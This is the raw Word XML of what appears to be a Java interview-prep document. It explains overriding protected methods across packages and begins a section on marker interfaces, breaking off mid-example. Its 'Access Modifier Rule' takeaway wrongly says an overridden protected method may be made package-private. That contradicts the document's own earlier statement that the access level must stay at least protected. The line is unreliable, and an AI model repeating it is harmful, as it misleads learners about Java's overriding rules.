      </w:r>
    </w:p>
    <w:p w14:paraId="6B79775E" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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verriding a Protected Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE53ACC" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461F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 override a protected method in a subclass. However, there are some restrictions related to the access level of the overridden method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D8272" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77521D30" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 the same package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the subclass is in the same package as the parent class, it can override the protected method without any issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2436A91C" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 a different package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the subclass is in a different package, the protected method can still be overridden, but the access level of the overridden method must be at least protected. It cannot be made more restrictive (e.g., turning it into private), but it can be made more permissive (e.g., turning it into public).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60025596" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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1: Overriding protected method within the same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3C2A6"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F30D9"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are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8B1C6CE"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otecte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displ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7249BBC"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rotected method in Parent"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62775F66"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893BFAC"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772CE75F"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B52911"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Subclass in the same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F526E7"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hil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xtend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are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7E22876"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2A3707B7"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otecte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displ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C2FD0F3"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Overridden protected method in Child"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FA91B"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3B75ECD"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBCD131"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1FBCC"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i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115A763"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6C3587A"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hild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> chil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hild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F264684"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        chil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ispl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 Overridden protected method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C1C15"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0E6A854" w14:textId="534FDEE8"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0D482B3B" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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2: Overriding protected method in a different package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2B7F6"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Parent class (In package p1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8850DB"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E929807"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF46C6"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are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8AAC1B7"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otecte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displ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9D674A1"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rotected method in Parent"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434514BD"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C395EBE"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF46ED2"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C5949"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Subclass (In package p2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A2E0B"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> p2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249544D3"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E0A8D"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p1</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Parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37678A08"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A272156"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hil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xtend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are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A369E35"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4C603969"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displ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an increase the visibility to public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287490A"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Overridden public method in Child"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09BA95"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F47B793"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A6D3F"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E0AFE"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i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898648D"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9564A7E"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hild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> chil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hild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E749260"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        chil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ispl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 Overridden public method in Child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920351A" w14:textId="77777777"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F46F953" w14:textId="6AC502FE" w:rsidR="00C56C6E" w:rsidRPr="00CE4B95"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56B91819" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461FF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Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE5B1D" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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verriding is allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can override a protected method in a subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A2DD2" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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 Modifier Rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can make the overridden method public, protected, or package-private (default). You cannot make it private or more restrictive than the original method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C934D" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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heritance Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You must maintain the visibility of the method as per the original access level (i.e., protected, public), but you can make it less restrictive (e.g., public).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBCBC8" w14:textId="77777777" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00461FF9" w:rsidP="00461F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summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you can override a protected method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but you need to ensure that the overridden method's access level is at least as permissive as the original method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093745F1" w14:textId="565AF70B" w:rsidR="00461FF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00461FF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7DA221A">
          <v:rect id="_x0000_i1171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70256359" w14:textId="7DF47D0E" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="009C6B66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc196307527"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is marker interface in java? What is the purpose of the marker interface</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="5AC7B8CD" w14:textId="36A80CC8" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What is a Marker Interface in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0965BE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>marker interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface in Java that doesn't contain any methods. Its sole purpose is to signal or "mark" a class with a specific property, behavior, or ability. In essence, a marker interface is an empty interface used to convey some metadata to the JVM or other parts of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290F89F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001C4545">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example of a Marker Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE5EAE"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B30E08"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E2273"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// No methods or fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC4B94"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C3046"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74EEE4"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Class that implements the marker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD8575"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436862"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
